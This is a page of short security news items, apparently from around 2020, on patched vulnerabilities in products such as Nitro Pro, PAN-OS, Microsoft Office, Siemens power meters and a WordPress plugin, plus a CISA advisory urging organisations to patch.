Security News

Two recently addressed vulnerabilities in the Nitro Pro PDF editor could be exploited by malicious actors to execute code remotely on affected hosts, according to Cisco's Talos threat intelligence and research group. Nitro Pro is a piece of software designed for reading, editing, signing, and saving PDF files.

Vulnerabilities discovered by a researcher at industrial cybersecurity firm Claroty in Opto 22's SoftPAC virtual programmable automation controller expose operational technology networks to attacks. SoftPAC has three main components: Monitor, Agent and the virtual controller itself.

That's just one of the vulnerabilities that the agencies are seeing being exploited this year by what they say are sophisticated foreign cyber actors. All that for 2020, and we still haven't even gotten to the meat of the report: the 10 most exploited vulnerabilities for the years 2016 through 2019.

Palo Alto Networks this week informed customers that it has patched over two dozen vulnerabilities in PAN-OS, the software that runs on the company's next-generation firewalls. Another potentially serious issue is CVE-2020-2012, a high-severity XXE vulnerability that allows a remote and unauthenticated attacker with access to the Panorama interface to read arbitrary files from the system.

Several Microsoft Office vulnerabilities that were patched years ago continue to be among the security flaws most exploited in attacks, the U.S. government warns. The bugs, the alert underlines, are routinely exploited by foreign cyber actors in attacks targeting both the public and private sectors, and risks associated with them could be mitigated "Through an increased effort to patch systems and implement programs to keep system patching up to date."

Siemens informed customers on Tuesday that some of its low and high voltage power meters are affected by the Wind River VxWorks vulnerabilities dubbed Urgent/11. According to Siemens, its Power Meter 9410 and 9810 series products are affected by ten of the eleven Urgent/11 flaws.

The US Cybersecurity and Infrastructure Security Agency is urging organizations to patch a slew of old and new software vulnerabilities that are routinely exploited by foreign cyber actors and cyber criminals. "Foreign cyber actors continue to exploit publicly known-and often dated-software vulnerabilities against broad target sets, including public and private sector organizations. Exploitation of these vulnerabilities often requires fewer resources as compared with zero-day exploits for which no patches are available," the agency noted.

Microsoft's May 2020 security updates patch 111 vulnerabilities, including 16 rated critical, but none of them has been exploited in attacks or disclosed before fixes were released. "For the past three months, Microsoft has been issuing very large Patch Tuesday releases, with March fixing 115 vulnerabilities, April with 113, and now May with 111. This shows their commitment to resolving vulnerabilities in their software, and their continued engagement with the security community."

Adobe has patched a total of 36 vulnerabilities in its Acrobat and Reader products and the DNG software development kit. Several researchers have been credited by Adobe for reporting the Acrobat and Reader vulnerabilities.

Two high-severity vulnerabilities addressed recently in SiteOrigin's Page Builder WordPress plugin could allow an attacker to execute code in a website administrator's browser. A page creation plugin, Page Builder by SiteOrigin helps users create column-based content that can adapt to mobile devices, and also provides them with support for the most common widgets.